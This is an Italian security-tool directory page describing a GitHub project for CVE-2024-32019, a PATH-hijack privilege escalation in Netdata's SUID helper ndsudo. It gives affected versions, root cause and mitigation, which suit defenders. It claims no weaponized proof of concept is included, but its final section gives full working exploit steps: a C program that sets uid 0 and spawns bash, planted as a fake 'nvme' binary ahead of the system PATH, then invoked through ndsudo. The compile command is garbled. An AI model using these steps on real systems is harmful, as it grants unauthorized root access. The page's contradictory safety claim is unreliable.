Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
cve-2024-32019-PoC — PoC non armato e checker per CVE-2024-32019, una escalation di privilegi locale nell'helper ndsudo di Netdata. Valuta l'esposizione, verifica le patch e comprendi il vettore di sfruttamento basato su PATH. | Kitploit
Strumenti/GitHubGitHub/sphyos/cve-2024-32019-poc
Escalation di PrivilegiAnalisi delle VulnerabilitàExploitPenetration TestingApprendimento e FormazioneLab e Pratica
GitHubsphyos/cve-2024-32019-poc

cve-2024-32019-PoC

PoC non armato e checker per CVE-2024-32019, una escalation di privilegi locale nell'helper ndsudo di Netdata. Valuta l'esposizione, verifica le patch e comprendi il vettore di sfruttamento basato su PATH.

Vedi Repository
21 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2024-32019 — ndsudo di Netdata: Escalation dei Privilegi Locali

Riepilogo

L’helper ndsudo di Netdata (installato con setuid root) limita i comandi che può eseguire, ma risolve questi comandi usando il PATH del chiamante. Nelle versioni vulnerabili, un utente locale può posizionare un binario dannoso più a monte nel PATH e fare in modo che ndsudo lo esegua con privilegi di root. Corretto in Netdata 1.45.3 e 1.45.0-169.

Vulnerabili / Corretto

  • Vulnerabili: >= 1.44.0-60, < 1.45.0-169 e >= 1.45.0, < 1.45.3 (secondo l'avviso upstream).
  • Corretto: 1.45.3 (stabile), 1.45.0-169 (nightly). GitHub

Impatto

Escalation dei privilegi locali a root su sistemi dove ndsudo è installato SUID e l'utente può invocarlo (comunemente membri del gruppo netdata). NVD GitHub

Causa principale (alto livello)

  • ndsudo è SUID-root e autorizza sottocomandi come nvme-list, nvme-smart-log, ecc.
  • Chiama eseguibili esterni per nome (es. nvme), che vengono risolti tramite PATH invece di usare percorsi assoluti o una ricerca sicura fissa.
  • Se una directory scrivibile appare prima dei percorsi di sistema, un utente malintenzionato può introdurre un binario simile che viene eseguito come root. GitHub

Riproduzione / Verifica Sicura

Questo repository include strumenti di controllo non exploit che:

  • Ispezionano /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo (o dovunque sia installato) per SUID/proprietà.
  • Enumerano PATH per directory scrivibili prima dei percorsi di sistema comuni.
  • Confermano la presenza di nomi di sottocomandi autorizzati che ndsudo potrebbe tentare di eseguire.
  • Opzionalmente eseguono ndsudo --test <sottocomando> per stampare il comando risolto senza eseguirlo (usare con cautela, leggere prima il codice). GitHub

⚠️ Nessun PoC armato è incluso. Questo progetto è per difensori e ricercatori per valutare l'esposizione e validare le patch in modo responsabile.

Mitigazione

  • Aggiornare Netdata a 1.45.3 (stabile) o 1.45.0-169 (nightly).
  • Come misura di difesa in profondità, preferire percorsi assoluti o un PATH minimo sanificato negli helper SUID; evitare di concedere accesso non necessario a ndsudo. GitHub wiz.io

Passaggi dell'Exploit

1. Salva il seguente codice C come nvme.c:
root@kitploit:~
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main() {
    setuid(0);
    setgid(0);
    execl("/bin/bash", "bash", NULL);
    return 0;
}
2. Compila l'Exploit
root@kitploit:~
gcc nvme.c - nvme
3. Configurazione dell'Ambiente
root@kitploit:~
mkdir -p /tmp/fakebin
mv nvme /tmp/fakebin/
chmod +x /tmp/fakebin/nvme
4. Modifica il PATH
root@kitploit:~
export PATH=/tmp/fakebin:$PATH
5. Comando di Exploit
root@kitploit:~
/opt/netdata/usr/libexec/netdata/plugins.d/ndsudo nvme-list

Riferimenti

  • NVD: CVE-2024-32019. NVD
  • Advisory Netdata (GHSA-pmhq-4cxq-wj93). GitHub
  • Riepilogo di Wiz. wiz.io
  • Analisi di Snyk. Vulnerability Guide
  • Elenco MITRE/CVE. CVE
Scarica lo strumento